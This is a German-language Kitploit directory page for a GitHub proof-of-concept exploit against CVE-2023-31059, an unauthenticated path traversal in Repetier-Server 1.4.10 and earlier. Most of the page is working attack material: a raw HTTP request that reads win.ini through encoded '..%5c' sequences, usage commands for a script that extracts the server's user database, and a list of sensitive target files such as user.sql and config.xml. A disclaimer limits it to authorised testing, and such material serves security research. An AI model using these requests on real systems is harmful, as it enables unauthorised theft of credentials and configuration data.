Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-31059-Repetier-Server-1.4.10-Unauthenticated-Path-Traversal — Proof-of-Concept-Exploit für CVE-2023-31059, eine nicht authentifizierte Path Traversal in Repetier-Server ≤1.4.10, die beliebiges Dateilesen über manipulierte HTTP-Anfragen ermöglicht. | Kitploit
Tools/GitHubGitHub/mbanyamer/cve-2023-31059-repetier-server-1.4.10-unauthenticated-path-traversal
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsLernen & Bildung
GitHubmbanyamer/cve-2023-31059-repetier-server-1.4.10-unauthenticated-path-traversal

CVE-2023-31059-Repetier-Server-1.4.10-Unauthenticated-Path-Traversal

Proof-of-Concept-Exploit für CVE-2023-31059, eine nicht authentifizierte Path Traversal in Repetier-Server ≤1.4.10, die beliebiges Dateilesen über manipulierte HTTP-Anfragen ermöglicht.

Repository anzeigen
1vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Repetier-Server <= 1.4.10

Autor: Mohammed Idrees Banyamer
Rolle: Sicherheitsforscher
Land: Jordanien 🇯🇴


Übersicht

Proof‑of‑concept-Exploit für eine unauthentifizierte Remote-Pfad-Traversal-/LFI-Schwachstelle in Repetier‑Server ≤ 1.4.10.

Die Schwachstelle ermöglicht das beliebige Lesen von Dateien über manipulierte ..%5c-Sequenzen im Endpunkt connectionLost.php.


Details zur Schwachstelle

FeldWert
ProduktRepetier‑Server
Betroffen≤ 1.4.10
CVECVE‑2023‑31059
TypPfad-Traversal / LFI
AuthentifizierungKeine
VektorNetzwerk
AuswirkungBeliebiges Lesen von Dateien
CVSS9.8 Kritisch

PoC-Angriffsablauf

root@kitploit:~
flowchart LR
    A[Attacker] -->|HTTP request with ..%5c traversal| B[Repetier Server]
    B --> C[base/connectionLost.php]
    C -->|Unsanitized file parameter| D[Windows Filesystem]
    D --> E[Sensitive File]
    E --> B
    B -->|File contents in HTTP response| A

Exploit-Beispiel

root@kitploit:~
GET /base/connectionLost.php?file=..%5c..%5cWindows%5cwin.ini HTTP/1.1
Host: target:3344

Verwendung

root@kitploit:~
# Test vulnerability
python3 CVE-2023-31059.py http://<target-ip>:3344/ --test

# Extract user database
python3 CVE-2023-31059.py http://<target-ip>:3344/ \
  --file "ProgramData\\Repetier-Server\\database\\user.sql" \
  --depth 20

Anforderungen

root@kitploit:~
pip install requests

Hochwertige Ziele

root@kitploit:~
ProgramData\Repetier-Server\database\user.sql
ProgramData\Repetier-Server\config.xml
Windows\win.ini
Windows\System32\drivers\etc\hosts

Haftungsausschluss

Dieser PoC dient ausschließlich zu Bildungszwecken und für autorisierte Sicherheitstests. Verwenden Sie ihn nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche Genehmigung zum Testen haben.


Kontakt

GitHub: https://github.com/mbanyamer

Tool herunterladen